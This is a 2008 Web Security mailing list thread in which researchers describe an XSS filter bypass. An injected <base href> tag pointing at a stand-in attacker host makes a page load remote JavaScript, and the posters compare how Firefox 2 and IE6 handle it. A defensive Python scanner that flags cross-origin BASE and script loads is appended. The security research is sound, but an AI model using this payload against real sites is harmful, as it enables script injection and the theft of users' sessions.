
Re: [WEB SECURITY] Nice little XSS trick



Definitely. Inserting a <base> tag in the <body> of an HTML document works
in Firefox 2.0.0.15

Thanks
Prasad Shenoy

On Tue, Jul 15, 2008 at 1:50 PM, Amit Klein <aksecurity@xxxxxxxxx> wrote:
> Prasad Shenoy wrote:
>>
>> Amit -
>>
>> When you say observed by FF 2, I guess you mean this should not work
>> in FF 2 correct? But it works with FF 2.
>>
>
> When I tested it, FF 2 ignored BASE tags outside the HEAD section (if you
> have information to the contrary, please share). That doesn't mean the
> attack completely fails - it means that the injection point must be inside
> the HEAD section (less common, but may still happen).
>
>> As this is a very simple example, I would like to believe that you are
>> assuming that in order to invoke functions from the attacker
>> controlled JS file (because there is no JS involved in the payload),
>> the attacker would create a file with the same filename and function
>> names as the one on the victim's domain. This way the actual (good) JS
>> file will be overwritten by the attacker controlled JS and all the
>> functions will be called from cross domain.
>>
>
> Exactly.
>
> -Amit
>
>
>> Valid?
>>
>> Thanks
>> Prasad Shenoy
>>
>> Prasad Shenoy
>> On Tue, Jul 15, 2008 at 7:33 AM, Amit Klein <aksecurity@xxxxxxxxx> wrote:
>>
>>>
>>> Hi list
>>>
>>> Recently I've been thinking about bypassing anti-XSS filters, and a nice
>>> little trick occurred to me, which I haven't seen anywhere (e.g. it's not
>>> on RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention
>>> BASE, but not the trick I describe here). The idea is to use the HTML BASE
>>> tag to force loading of JS code from the attacker's host. Consider a page
>>> with XSS vulnerability such as:
>>>
>>> <html>
>>> ...
>>> ***XSS code may be embedded here***
>>> ...
>>> <script src="/foo/bar.js"></script>
>>> ...
>>> </html>
>>>
>>> Now, an attacker can inject <base href="http://www.attacker.tld/">, and
>>> next thing you know, the browser (IE, at least) loads the JS from
>>> http://www.attacker.tld/foo/bar.js... And the beauty is that there's no
>>> "explicit" JS code involved in the payload itself.
>>>
>>> Note that according to the HTML standard, BASE should be placed in the
>>> HEAD section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE).
>>> This is indeed observed by FF 2, but not by IE (checked IE6).
>>>
>>> Thanks,
>>> -Amit
>>>
>>>
>>>



-- 
Ah! the joy of hacking....
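An added check in the spirit of this thread, not code from any of the posters: it resolves every relative <script src> against the effective <base href> (first BASE wins, as browsers do) and flags scripts that would be fetched from an origin other than the page's own, plus any BASE outside <head> (which HTML 4.01 forbids, hence the FF 2 behaviour discussed above). The victim origin and the sample document are constructed placeholders.

```python
# Added example (not code from the thread): flag an injected <base> and the
# relative <script src> loads it would redirect to another origin. The first
# BASE wins, as in browsers; a BASE outside <head> is reported separately.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

def origin(url):
    p = urlsplit(url)
    return (p.scheme, p.netloc)       # scheme + host[:port]

class BaseScanner(HTMLParser):
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.base = None              # effective base href; first one wins
        self.in_head = False
        self.findings = []            # (kind, absolute url) in document order

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "head":
            self.in_head = True
        elif tag == "base" and a.get("href"):
            href = urljoin(self.page_url, a["href"])
            if not self.in_head:
                self.findings.append(("base-outside-head", href))
            if origin(href) != origin(self.page_url):
                self.findings.append(("cross-origin-base", href))
            if self.base is None:
                self.base = href
        elif tag == "script" and a.get("src"):
            src = urljoin(self.base or self.page_url, a["src"])
            if origin(src) != origin(self.page_url):
                self.findings.append(("cross-origin-script", src))

    def handle_endtag(self, tag):
        if tag == "head":
            self.in_head = False

def scan(page_url, html):
    s = BaseScanner(page_url)
    s.feed(html)
    return s.findings

# Constructed sample: the thread's page with the BASE injected in <body>.
PAGE_URL = "https://www.example.test/app/page"   # placeholder victim origin
SAMPLE_HTML = ('<html><head><title>t</title></head><body>'
               '<base href="http://www.attacker.tld/">'
               '<script src="/foo/bar.js"></script></body></html>')
```

Running `scan(PAGE_URL, SAMPLE_HTML)` on a response body (e.g. in a scanner or a response-side filter) yields one finding per problem; a same-origin BASE inside <head> produces none.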

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA



Brought to you by http://www.webappsec.org